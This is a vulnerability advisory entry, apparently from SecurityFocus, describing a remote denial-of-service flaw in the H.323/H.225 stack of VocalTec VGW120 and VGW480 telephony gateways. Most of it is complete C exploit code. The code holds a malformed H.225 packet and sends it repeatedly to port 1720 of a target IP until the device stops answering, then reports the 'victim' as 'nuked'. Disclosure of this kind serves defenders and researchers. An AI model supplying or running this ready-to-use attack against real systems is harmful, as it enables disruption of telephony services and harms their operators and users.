source: http://www.securityfocus.com/bid/10411/info

It has been reported that the VocalTec VGW120 and VGW480 Telephony Gateways are prone to a remote denial of service vulnerability. The issue is reported to exist in the ASN.1/H.323/H.225 stack.

A remote attacker may exploit this issue to deny service to the affected appliances. 

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>

#define H323_SIGNAL_PORT 1720

unsigned char kill_buff[] = {\
0x03, 0x00, 0x01, 0x57, 0x08, 0x02, 0x00, 0x04, 0x05, 0x04, 0x03, 0x80, 0x90, 0xa5, 0x6c, 0x0b,
0x81, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x70, 0x0c, 0x81, 0x31, 0x32,
0x33, 0x34, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x7e, 0x01, 0x2b, 0x05, 0x20, 0x80, 0x06,
0x00, 0x08, 0x91, 0x4a, 0x00, 0x04, 0x28, 0x00, 0xb5, 0x00, 0x00, 0x12, 0x40, 0x01, 0x3c, 0x05,
0x01, 0x00, 0x00, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63, 0x64, 0x65,
0x66, 0x67, 0x68, 0x00, 0x8d, 0x1d, 0x82, 0x07, 0x00, 0xac, 0x10, 0x01, 0x01, 0x02, 0x9a, 0x11,
0x00, 0x62, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67,
0x68, 0x32, 0x02, 0x12, 0x00, 0x00, 0x00, 0x0d, 0x40, 0x01, 0x80, 0x0a, 0x04, 0x00, 0x01, 0x00,
0xac, 0x10, 0x01, 0x01, 0x47, 0xf1, 0x1d, 0x40, 0x00, 0x00, 0x06, 0x04, 0x01, 0x00, 0x4d, 0x40,
0x01, 0x80, 0x11, 0x14, 0x00, 0x01, 0x00, 0xac, 0x10, 0x01, 0x01, 0x47, 0xf0, 0x00, 0xac, 0x10,
0x01, 0x01, 0x47, 0xf1, 0x01, 0x00, 0x01, 0x00, 0x01, 0x80, 0x01, 0x80, 0x00, 0x0a, 0xa8, 0x01,
0x80, 0x6f, 0x01, 0x40, 0xb5, 0x00, 0x00, 0x12, 0x68, 0xe0, 0x01, 0x01, 0x00, 0x01, 0x1c, 0x58,
0x1c, 0x39, 0x9e, 0x01, 0x00, 0x03, 0x67, 0x74, 0x64, 0x00, 0x00, 0x00, 0x2e, 0x49, 0x41, 0x4d,
0x2c, 0x0d, 0x0a, 0x47, 0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62,
0x66, 0x31, 0x38, 0x31, 0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65,
0x62, 0x30, 0x62, 0x31, 0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a, 0xa1, 0x04, 0x03, 0x90, 0x90,
0xa3, 0x18, 0x03, 0xa1, 0x83, 0x9f, 0x1e, 0x02, 0x81, 0x83, 0x70, 0x0c, 0x81, 0x37, 0x30, 0x39,
0x35, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x04, 0x80, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00,
0x03, 0x35, 0x02, 0x04, 0x67, 0x74, 0x64, 0x01, 0x2e, 0x49, 0x41, 0x4d, 0x2c, 0x0d, 0x0a, 0x47,
0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62, 0x66, 0x31, 0x38, 0x31,
0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65, 0x62, 0x30, 0x62, 0x31,
0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a};

int nuke_victim(char * ip)
{
 int sock;
 struct sockaddr_in vict_addr;
 
 if ((sock=socket(AF_INET, SOCK_STREAM, 0))==-1)
  {
  perror("nuke_victim()::socket()");
  return -1;
  }
 memset(&vict_addr, 0, sizeof(vict_addr));
 vict_addr.sin_family=AF_INET;
 inet_pton(AF_INET, ip, &vict_addr.sin_addr);
 vict_addr.sin_port=htons(H323_SIGNAL_PORT);
 if (connect(sock, (struct sockaddr *) &vict_addr, sizeof(vict_addr))==-1)
  {
  close(sock);
  if (errno==ECONNREFUSED) return 1;
  perror("nuke_victim()::connect()");
  return -1;
  }
 if (send(sock,kill_buff,sizeof(kill_buff),MSG_NOSIGNAL)!=sizeof(kill_buff))
  {
  close(sock);
  if (errno==EPIPE) return 1;
  perror("nuke_victim()::send()");
  return -1;
  }
 close(sock);
 return 0;
}

int main(int argc, char ** argv)
{
 int ret_flag=0;
 int try_count=0;
 if (argc<2)
  {
  fprintf(stderr, "Usage: %s <victim IP>\n", argv[0]);
  return 1;
  }
 while((ret_flag=nuke_victim(argv[1]))==0) 
  {
  try_count++;
  usleep(100000);
  }
 if (ret_flag==-1) printf("Execution aborted with internal error\n");
 if (ret_flag==1) printf("Victim %s successfully nuked with %d tryes\n", argv[1], try_count);
 return 0;
}

